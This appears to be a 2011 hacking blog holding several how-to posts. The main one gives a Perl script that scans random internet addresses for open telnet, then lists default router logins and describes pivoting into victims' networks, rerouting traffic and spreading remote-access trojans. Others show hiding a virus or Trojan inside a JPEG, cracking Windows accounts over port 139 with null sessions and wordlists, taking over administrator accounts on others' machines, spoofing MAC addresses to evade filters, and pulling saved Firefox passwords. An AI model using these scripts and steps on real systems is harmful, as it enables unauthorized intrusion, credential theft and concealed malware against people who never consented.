Monday, January 24, 2011

Manually Hide any file in JPEG

Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick


Things that you will need for this trick:
1. Winrar installed on your system.
2. Little knowledge of command prompt.


hide files, hide files in images,how to file virus,hiding trojans


Steps to Hide any File behind JPEG image Manually
 
1. Create an folder into C drive (recommendation is that use this C:\Hidden).

2. Now gather all files that you want to hide in this folder.

3. Now add these all files to compressed .rar file using winrar 
(example myhiddenfiles.rar ).
Note: This rar file should be in the same directory (i.e. C:\Hidden)

4. Now Select the JPEG file that you want to use to hide the above content 
(say myimage.jpg). Put this image file also in the same folder that is in C:\Hidden

5. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
  (When you open CMD you will get like C:\Documents and settings\username (something like this)
 Now type cd.. and press enter and then again type cd.. and press enter. Now you have something like this in cmd  C:\   . Now in front of that type cd "Hidden"  and press enter. )

6. Now type: “COPY /b myimage.jpg + myhiddenfiles.rar outputimage.jpg” (without quotes) - Now, myimage.jpg is the picture you want to show, myhiddenfiles.rar is the file to be hidden, and outputimage.jpg is the file which contains both....

7. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive...

This hack will help us to hide things behind the JPG file without any software. i hope you all have liked it. For more such hacks keep visiting.
................................................................................................................................................................................................................
................................................................................................................................................................................................................

Friday, January 21, 2011

Hack Rapidshare | hack Hotfile | bypass time limit

Rapidshar Hack | Hotfile Hack | Hack mediafire
Bypass time limit


Most of the file hosting services such as Rapidshare, Mediafire, Uploading, Hotfile and many more give very less features to free users and force them to wait for a limited amount of time with many limitations. In this blog you will find many links belonging to those file servers. There are many softwares and tricks are available to hack those servers premium features. I am going to write about a firefox addon. Which helps you in great way. This is Skipscreen.


Download Skipscreen to your firefox browser:
http://dl.skipscreen.com/files/SkipScreen-Setup.exe 


everytime when you visit any of these file hosting website you will see like this.

and within some seconds downloading will start..

SkipScreen works great on these sites:


  • Rapidshare (don't click! it's automatic!)
  • Megaupload (captcha action coming soon!)
  • Mediafire
  • Uploaded.to
  • zShare (now with a "listen-first" option!)
  • Sharebee
  • DepositFiles
  • Sendspace
  • Divshare
  • Linkbucks
  • Link-protector
Many More 
..........................................................................................................................................................................................................
..........................................................................................................................................................................................................

Hack Router For Exploration

 REMOTE ROUTER HACKING
Introduction
Ok, Basically this tutorial deals with how to scan large amounts of addresses for telnet services, which we can then attempt to use default credentials to log in with surprising success.

Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by SSH because telnet sends packets in plain text where as SSH encrypts packets. But telnet is still very much used on routers for simple administration by low tech management systems that come packaged with alot of off the shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So what do i need ?
You'll need to run this perl script, (written by me, found below), this simply generates a random IP address, if the IP is in a scannable class (ie not a private, experimental or loop back address) the programme attempts to open a connection to the telnet port (23) of the random ip, if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers - ive left mine overnight before and collected 880 servers before.


Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223;                        #avoid experimental and multicast
my $range2 = 254;              
$oct1 = int(rand($range1)) + 1;                    #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();                            #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
}
return $ip;                            #return to caller      
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){                            # keeps code running indefinatly
$target = &ipgen();                        # get random ip to scan
print "*??* SCANNING: $target \n";                    # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '23',        # change this number to change ports you want to detect
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 2 to be safe
                 );
if($sock){                            # if socket opened (port open)
print "*!!* SUCCESS-: $target \n";                # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File");     # open results file
print DAT "SUCCESS: $target \n";                # append findings to end of file
close(DAT);                            # close the file
}
close($sock);                            # close the socket
}################################################################

Youll also need need a telnet client - I recommend you use putty because it supports proxys, but you are dealing with people who dont know how to change there router passwords so you shouldnt be too worried so you can use the defauly OS telnet client - for windows XP/linux users you will already have one - for windows 7 users you will need to enable yours with this tutorial .

Ok - I'm Set Up - So Now What?
Youll need to start a few instances of the perl script, you can make your desktop look pretty like mine below if you wish.

[Image: 4185786.png]

You can just run one but it will take longer to get a decent sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

Ok now you have your list of IP's with the telnet port open (called telnet.txt in the same directory as your perl script), what you need to do is take your telnet client and just start connecting to them, - you will be prompted for a username + password.

This is where it gets fun - because alarge amount of routers ship with default accounts - here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest alot of routers disclose there model number in the telnet banner when you connect so a simple google search often turns up the default username and password. Otherwise i try the top 3 and usually get disconnected and move on to the next in my list.

You will find out quiet fast how many ip's in your list you can actually log into with full admin rights

[Image: 4185900.png]
Who Exactly Am I Hacking?
This is half the fun for me - you dont really know - if your interested you can just do a quick whois -but around 90% of the time your dealing with home routers that people have bought from a shop and not configured properly but i have found business and offices that have succumb to the same laziness as the home user so the possibilities are endless.

Ok now what ?
From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. Today i found one that let me download any C code onto it i wanted - almost every router OS is different so some take a while to get used to what commands you can run but it is alot of fun finding out peoples network layout, i have compromised routers, made my way into the internal file servers of the network using brute forcers, or setting up port forwarding on the router to give me access externally to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copys of the dictionary or what ever literature tickles your pickle.

A funny concept that i have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RAT's spread, especially if you find a router with upwards of 100 PC's behind the router - but i dont deal much with rat's and botnets so dont quote me on that.

A Small Aside.

Ill be happy if a few people read this tutorial and explore a few networks because thats what used to drive hacking forwards, and its what used to motivate hackers, the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting there best friends fu**book password and the real fun somehow has been lost in the past 10 years to a new generation of kids that just want everything now. Lets keep some of the old skills and knowledge alive and not let it be lost in the archives of long since abandoned forums and irc rooms.

Thanks For Reading - Happy Hacking.
Special Thanks To SOLARIS
.........................................................................................................................................................................................................
.........................................................................................................................................................................................................

Enable Telnet in windows 7

It’s very rare that I use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps:
  1. Start
  2. Control Panel
  3. Programs And Features
  4. Turn Windows features on or off
  5. Check Telnet Client
  6. Hit OK
After that you can start Telnet via Command Prompt. Credits FettesPS
.................................................................................................................... ............................................................................

Spoof MAC Address in Any OS


MAC address (Media Access Control address) is a quasi-unique identifier consists of a six byte number that attached to most network adapter card or network interface card (NIC). As such, all network cards, whether it’s of Ethernet NIC, Gigabit Ethernet NIC or wireless 802.11a/b/g/n WiFi or HiperLAN adapter, should have different MAC addresses, which also known as Ethernet Hardware Address (EHA) or adapter address.

In operating system, MAC address is often represented in 12-digit hexadecimal number. For example, 1A-2B-3C-4D-5E-6F. In practical usage, layer 2 MAC address is converted from layer 3 protocol addresses such as Internet Protocol (IP address) by ARP (Address Resolution Protocol), which then allowed each host to be uniquely identified and frames to be marked for specific hosts on broadcast networks, such as Ethernet. After translated (or when a host on LAN sends its MAC address to another machine which does n ot configured not to accept unrequested ARP replies on the network for preemptive caching), MAC address is cached on source PC ARP table for later use. Content of ARP table on each computer can be viewed by typing arp -a in Windows or arp in Linux. MAC address thus forms the basis of most of the layer 2 networking upon which higher OSI Layer protocols are built to produce complex, functioning networks.
There are many reasons or possibilities that an user may want to change the MAC address or a network adapter, which also known as MAC spoofing. For example, to bypass the MAC address filtering on firewall or router. The trick can be used to get pass the network access restriction by emulating a new unrestricted MAC address, or to gain access connection by spoof an authorized MAC address after sniffing the legitimate MAC address out of the air in MAC filtering Wi-Fi network.
Beside, hackers or enthusiasts also spoofing another host’s MAC address as their own in order to receive traffic packets not meant for them, although ARP poisoning technique is more commonly used. However, changing MAC address can still keep the real information from been detected and logged by various services such as IDS, firewall, DHCP server, wireless access points and etc, and is essential protect user’s privacy. MAC spoofing also potentially trigger a Denial of Service (DoS) attack by causing routing problem with duplicating MAC address exists in the network, especially those similar with gateway and AP router’s BSSID (Basic Service Set Identifier.)
Whatever the reason, it’s pretty easy to change the MAC address or perform MAC spoofing on most of today’s hardware, listed below. Actually, the original MAC address is burnt and imprinted to the network card, and cannot be changed. However, operating system can spoof as if there is different MAC address for the network interface card using tricks below.
Change the MAC address in Windows
  1. Go to Start -> Control Panel. Double click on Network Connections (inside Network and Internet Connections category in Windows XP). The, right click on the active network connection with network adapter that you want to change the MAC address (normally Local Area Network or Wireless Network Connection) and click on Properties. Above steps work in Windows XP, Windows 2000 and Windows Server 2003. For Windows Vista, access to NIC’s properties is from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.
    Alternatively, if you already know which network adapter that’s responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double click on the NIC itself.
  2. In the General tab, click on the Configure button.
  3. Click on Advanced tab.
  4. In the Property section, select and highlight Network Address or Locally Administered Address.
  5. To the right, “Not Present” radio button is by default selected as value. Change the value by clicking on radio button for Value:, and then type in a new MAC address to assign to the NIC. Change MAC Address of Network Adapter
    The MAC address consists of 6 pairs of numbers (0 – 9) and characters (A – F) combination. For example, 88-17-E8-90-E2-0A. When entering the new MAC value, omit the dash (-), for example 8817E890E20A.
  6. Click OK when done.
  7. To verify the change of MAC address, go to command prompt, then type in one of the following commands: ipconfig /all
    net config rdr
  8. Reboot the computer if successful to make the change effective.
Note: To restore or reset back to original default MAC address, simply set back the option to “Not Present”.
Change the MAC Address of NIC in Windows via Registry
  1. Open a command prompt.
  2. Type the following command and hit Enter. ipconfig /all
  3. Record down the Description and the Physical Address (is MAC address) of the active network connection (discard those with Media Disconnected state). Get MAC Address for Network Card
    For example, in figure above, Description is Intel(R) Wireless WiFi Link 4965AGN and MAC address is in the format of 00-XX-XX-XX-XX-XX.
  4. In the command prompt also, type the following command and hit Enter. net config rdr
  5. Record down the GUID for the MAC address for the active connection’s NIC which MAC address to be changed. The GUID is contained within the { and } brackets right in front of the MAC address as shown in figure below. GUID for the NIC
  6. Type regedt32 or regedit in Start -> Run box or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.
  7. Navigate to the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
  8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree, and there will be more sub-keys in the form of 0000, 0001, 0002 and so on.
  9. Go through each sub-key starting from 0000, look for subkey that has DriverDesc value data that matches NIC description copied from step above, that want its MAC address to be changed. In most cases, it will be similar to the network adapter card name. To verify that the subkey found is indeed a correct one, check the value of the NetCfgInstanceId, which should have the same value with the NIC’s GUID taken from step above.
  10. Once a sub-key is matched to the network interface card that MAC address want to be spoofed, select and highlight the subkey. Right click on the sub-key (for example, 0000), then select New -> String Value. Name the new value name as NetworkAddress. Note: If NetworkAddress REG_SZ registry key is already existed in the right pane, skip this step.
  11. The double click on NetworkAddress and enter a new MAC address as its value data. Change and Spoof MAC Address in Registry
    Note that the 12-digit MAC address in hexadecimal format, and should be entered without any dash (-). For example, 1A2B3C4D5E6F.
  12. Reboot the system to make the new MAC address effective. Alternatively, if you don’t want to restart the system, try to disable and then re-enable the network adapter in Device Manager.
  13. To verify the change of MAC address, go to command prompt, then type in one of the following commands: ipconfig /all
    net config rdr
Note: To restore or reset back to true original hardware burned-in MAC address, remove the NetworkAddress registry key that is been added.
Alternative: Third party tools and utilities to change the MAC address in Windows operating system are plenty, for example: SMAC (direct download link to smac20_setup.ex, supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip, for Windows XP), BMAC (almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link to macmakeup.zip, for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows, directly download MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).
How to Change MAC Address (MAC Spoofing) in Linux and *nix
To change your MAC address in Linux and most Unix-like (*nix) system, run the following script commands:
ifconfig down
ifconfig hw
ifconfig up
For example, the command looks lik “ifconfig eth0 down hw ether 1A:2B:3C:4D:5E:6F”. First command brings down the network interface, second command change its MAC address while third command bring up the interface again. Note that in some cases, to bring down and bring up the network interface, the following commands have to be used:
/etc/init.d/networking stop or /etc/init.d/network stop (in the case of Fedora Core 5)
/etc/init.d/networking start or /etc/init.d/network stop (in the case of Fedora Core 5)
Alternatively, for Fedora Code 5 Linux with Iproute2 tools installed, the following commands also can change the MAC address to spoofed version:
/etc/init.d/network stop
ip link set address 1A:2B:3C:4D:5E:6F
/etc/init.d/network start
For example, “ip link set eth0 address 1A:2B:3C:4D:5E:6F”. To check whether the MAC address has been spoofed, use ip link ls eth0 or ip addr ls eth0 instead of using ifconfig eth0.
How to Make the Spoofed MAC Address Permanently Even After Reboot in Linux
Edit the ifcfg-eth0 file (or other similar file if you’re changing different interface), add the following variable line to the file:
MACADDR=12:34:56:78:90:ab
Then run service network restart to make the change effective immediately.
How to Make the Spoofed MAC Address Permanently on Restart in Debian
Edit the /etc/network/interfaces file and add in the following variable line to the appropriate section so that the MAC address is set when the network device is started.
hwaddress 02:01:02:03:04:08
For example, “hwaddress ether 02:01:02:03:04:08″.
Alternative: GNU Mac Changer (for Debian, Slackware, ArchLinux, Mandrake, Crux and other RPM-based distributions such as Fedora, Red Hat, CentOS, ASPLinux, SUSE Linux, OpenSUSE and etc.
How to Change MAC Address (MAC Spoofing) in BSD or FreeBSD
Issue the following commands in shell:
ifconfig down
ifconfig
ifconfig up
First command brings down the network interface (optional), second command change its MAC address while third command bring up the interface again (optional). For example, the command looks lik “ifconfig xl0 link 1A:2B:3C:4D:5E:6F” or “ifconfig fxp0 ether 1A:2B:3C:4D:5E:6F”
How to Change MAC address in Solaris
The shell command to change the MAC address in Sun Solaris is as below:
ifconfig
For example, the command looks like “ifconfig hme0 ether 1A:2B:3C:4D:5E:6F”. Note that the change is temporary that does not persist after a reboot. To make this change permanent, the command can be placed in a runtime control script (/sbin/sh).
How to Spoof MAC Address in HP-UX
It’s possible to change MAC address using HP-UX SAM. Select Networking and Communications, then selecting the interface, then click on Action -> Modify -> Advanced Options. Finally, change the value of station address, which is MAC address name in HP-UX.
How to Spoof and Change MAC Address in OpenBSD
Use the following command to change MAC Address to spoofed MAC in OpenBSD (after version 3.8):
ifconfig lladdr
For example, “ifconfig bge3 lladdr 1A:2B:3C:4D:5E:6F”.
How to Change to Spoofed MAC Address Permanently in OpenBSD
To make the MAC address changed at boot before network connection is established, and even before parsing of hostname.* file, edit the /etc/netstart file to add in the following lines before the line of “# Now parse the hostname.* file”:
if [ "$if" = "INTERFACE" ]; then
ifconfig lladdr
fi

# Now parse the hostname.* file
....

How to Change MAC Address in Mac OS X
Since Mac OS X 10.4.x (Darwin 8.x) onwards, the MAC address of wired Ethernet interface can be altered in Apple Mac OS X in a fashion similar to the Linux and FreeBSD methods. To do so, type the following command in Terminal.app:
sudo ifconfig en0 ether aa:bb:cc:dd:ee:ff
or
sudo ifconfig en0 lladdr aa:bb:cc:dd:ee:ff (for Mac OS X 10.5 Leopard)
where en0 is the network interface (numbered from en0, en1, en2 …) and aa:bb:cc:dd:ee:ff is the desired MAC address in hex notation.
Alternative: MacDaddy (download MacDaddyX.dmg, support Airport wireless adapter)
Thanks To www.mydigitallife.info
..............................................................................................................................................................................................................
..............................................................................................................................................................................................................

Monday, January 10, 2011

Hack Computers Inside LAN Network

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

[Image: 1_13.jpg]

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

You now need to create a null session to the target computer.

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar
...................................................................................................................................................................................................... 

Sunday, January 9, 2011

Configuring VNC-SERVER And Squid Proxy Server in CentOS

Configuring VNC-SERVER And Squid Proxy Server in CentOS (32 & 64) based VPS
Installing GUI based Gnome-Desktop, squid, vnc, vnc-server, firefox in centos based VPS
NOTE :-

# stands for comment
$ denotes sshell commands

1st. Open SSH of your VPS with your Favorite SSH client.

2nd. In Shell Prompt >_ Write commands as described below.

Code:
$ yum update -y

Phase of Installing All Products...

Code:
$ yum groupinstall gnome-desktop -y
# This will install 4 apps at once !
# 1 squid is advance proxy server
# 2 vnc is vnc viewer client
# 3 vnc-server is VNC server to operate remove computer's GUI interface of gnome from your desk.
# 4 firefox will unlease speed of internet as it is installed in VPS !

Code:
$ yum install squid vnc vnc-server firefox -y


# Configuring VNC-SERVER in CentOS based VPS....

# Set Your VNC Password For login..
Code:
$ vncpasswd
# Start vncserver to generate default config files...
Code:
$ vncserver


# As files are generated, we need to terminate vnc process(s) in order to make custom gnome configs..
Code:
$ pkill vncserver
$ pkill Xvnc
$ reboot



# Add gnome based configuration in this FILE via 'vi' editor..
# -To Edit Or Insert Text in vi editor Press 'i'
# -To Save Modified File Press 'Esc' > ':wq'
# -To Quit With-Out Saving 'Esc' > ':q!'
# -To break vi process 'Ctrl + C'

Code:
$ vi ~/.vnc/xstartup

# Add below code into file 'xstartup'
-- CUT - PASTE--
PHP Code:
#!/bin/sh
 
( while true; do xtermdone ) &
 
# Uncomment the following two lines for normal desktop: unset SESSION_MANAGER
exec 
/etc/X11/xinit/xinitrc
 
[ -/etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot 
-solid grey
vncconfig 
-iconic & xterm -geometry 1024x768 -ls -name "$VNCDESKTOP Desktop" & gnome-session 
-- CUT PASTE--




# To auto-start vnc server each time system boot.
Code:
$ chkconfig vncserver on


# To start vnc-server at a time.
Code:
$ service vncserver start

Now open vnc-viewer in your desktop and give IP of vps with :1
i.e 42.23.1.4:1
where :1 is port 5901 by default used by vnc-server in linux



# Configuring Squid Proxy Server in CentOS (32 & 64) based VPS....



# Switch to squid directory
Code:
$ cd /etc/squid


# move default squid configuration as a backup file !
Code:
$ mv squid.conf squid.conf.backup


# Receive Pre-made squid.conf file..
Code:
$ wget http://pastebin.com/download.php?i=Y8j35JS9 --output-document=/etc/squid/squid.conf

-- NOTE | Caution --
Change directives like mentioned below for confort !
.
.
.

# Change the default port 3128 to 8080 or 80 ! as per your need.
Code:
http_port 3128


# Check ur ip > tracemyip.org
# You should add your own range to get access to proxy server Or else it will show unauthorised access...

Code:
acl range_airtel src 122.0.0.0/255.0.0.0

...

http_access allow range_airtel
i.e.

Code:
acl range_US src 209.0.0.0/255.0.0.0

...

http_access allow range_US
.
.
-- End of NOTE | Caution --

_


# Make SQUID as service AS it should start at system-start (boot time)
Code:
$ chkconfig squid on


# Starting squid proxy server
Code:
$ service squid start


# Cross-Verify listening post via below command
Code:
$ netstat -tulpn | grep 3128

open your browser & set proxy IP & PORT in your browser & Bingo!
i.e IP: 42.23.1.4 Port: 3128
Thanks To aa-Numb
> For Educational Purpose Only ! 

.......................................................................................................................................................................................................

Thursday, January 6, 2011

Hack Into Administrator Account

Hello friends, welcome back today i am going to share with you all possible ways to hack admin or administrator account in windows XP. Today i will explain how to hack admin or administrator account in just 2 minutes. So guys get ready to hack your friends systems in 2 minutes.
Most of times specially in our college we don't have the access to the admin account, now suppose you want to install a software on that system. What you will do now? Ask the admin to enter the password for you or simply hack it by yourself. I will tell you frankly that i have never opted method one in my life. Whenever i need administrator right i have hacked it but guys don't do it like that ways because i got suspended from lab twice for doing that.

how to hack admin password,hacking password,reset admin password, system hacking

There are four ways to hack the admin password:
1. Simply accessing Unprotected Administrator Account.
2. Hacking Through Net User Command.
3. Hacking Using the ERD(Emergency Rescue Disk)  Commander.
4. Resetting admin password using Ubuntu Live CD or DVD. 

Lets start from the first technique to hack the admin or administrator password..

1. Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in snapshot below...
how to hack admin password,hacking password,reset admin password, system hacking

Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears..

how to hack admin password,reset admin password,hack computer password

Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecured i.e User as some other username like above shown figure...


2. Hacking admin or administrator account using net user command
Note: This will work only when user has access of user account or some how he has been allowed  or working in admin account.

Steps to hack admin account:
Step1: Goto the Start and click on Run and Type cmd and press enter ... 
Step 2: Now type "net user" in the command prompt to obtain the All accounts on that computer.. as shown in figure..

how to hack admin password,reset admin password,hack computer password,windows password hacking


Step 3: Now Select the account Which u want to Reset the Password...
Suppose that we want to Reset the Password  of Administrator...
Now Type "net user Administrator *  " Without quotes... and press Enter. As shown in the Below Figure..

reset admin password,hack computer password,windows password hacking

Step 4: Now after that press Enter Twice to rest the password. Now Next time u open that Account .. It will not require any Password..


3. Hacking admin account using ERD commander (100% working hack)
This hack has no restrictions , using this hack you can hack each and every computer.

First of all Download the ERD(Emergency Rescue Disk)  commander... Extract the Files and Make a CD...

STEPS INVOLVED :
1. Insert the ERD Commander Boot CD into the drive and restart the system
2. Boot the computer using ERD Commander Boot CD. You may have to set the boot order in the BIOS first.
3. Select your Windows XP installation from the list as shown.


How to hack Admin Account
4. From the ERD Commander menu (Start menu), click System Tools and click Locksmith
How to hack Admin Account

5. Click Next

How to hack Admin Account

6. Select the administrator account from the list for which you want to reset the password.
How to hack Admin Account

7. Type the new password in both the boxes, click Next and click Finish

How to hack Admin Account

8 . Restart The System and take the CD out of the Drive..And Enjoy Admin account...

Method 4: Resetting windows password using Ubuntu Live CD or DVD
For this hack you will require the Ubuntu Live CD.

Steps involved :

  1. Insert Ubuntu Live CD and boot from it.
  2. Open terminal and install chntpw in Ubuntu. To do so use the following commands.
    sudo apt-get update
    sudo apt-get install chntpw
  3. Now mount your Windows volume. In my case it was dev/sda1. Replace it with yours.
    sudo mkdir /media/WINDOWS
    sudo mount /dev/sda1 /media/WINDOWS
  4. Now navigate to the Windows configuration folder.
    cd /media/WINDOWS/WINDOWS/system32/config/
  5. To reset the administrator password enter
    sudo chntpw SAM
  6. After completing this command you will see 5 different choices. Select the 1st one and press Enter and its done. 
  7. Now restart your system, it will not ask any password.  
..............................................................................................................................................................................................................

Recover FireFox Passwords using FireFox Password Viewer

FirePasswordViewer is the GUI version of popular FirePassword tool to recover login passwords stored by Firefox. Like other browsers, Firefox also stores the login details such as username, password for every website visited by the user at the user consent. All these secret details are stored in Firefox sign-on database securely in an encrypted format. FirePasswordViewer can instantly decrypt and recover these secrets even if they are protected with master password.
Also FirePasswordViewer can be used to recover sign-on passwords from different profile (for other users on the same system) as well as from the different operating system (such as Linux, Mac etc). This greatly helps forensic investigators who can copy the Firefox profile data from the target system to different machine and recover the passwords offline without affecting the target environment.

Using FirePasswordViewer

FirePasswordViewer is the standalone application and it does not require any installation. You can just run it by double clicking on the executable file.

Here are the brief usage details.
  • On running, FirePasswordViewer automatically populates the Firefox profile location if it is already installed. Otherwise you can enter the profile location manually.
  • If you have set the master password for your Firefox, then you need to specify the same in the master password box.
  • Once the profile location is specified, you can click on "Start Recovery" button and FirePasswordViewer will instantly recover all passwords from Firefox sign-on store.
  • By default passwords are not shown for security reasons as it is sensitive data. However you can click on "Show Password" button to view these passwords.
  • Finally you can save all recovered password list to HTML file by clicking on "Save as HTML" button.

You can also use FirePasswordViewer to recover passwords from different system either Windows or Linux. In that case you can copy Firefox profile data from remote system to local machine and then specify that path in the profile location field for recovering the passwords.

Screenshots of FirePasswordViewer



Screenshot 2: Showing the hidden passwords recovered by FirePasswordViewer on clicking "Show Password" button.






Download FireFox Password Viewer Here
.........................................................................................................................................................................................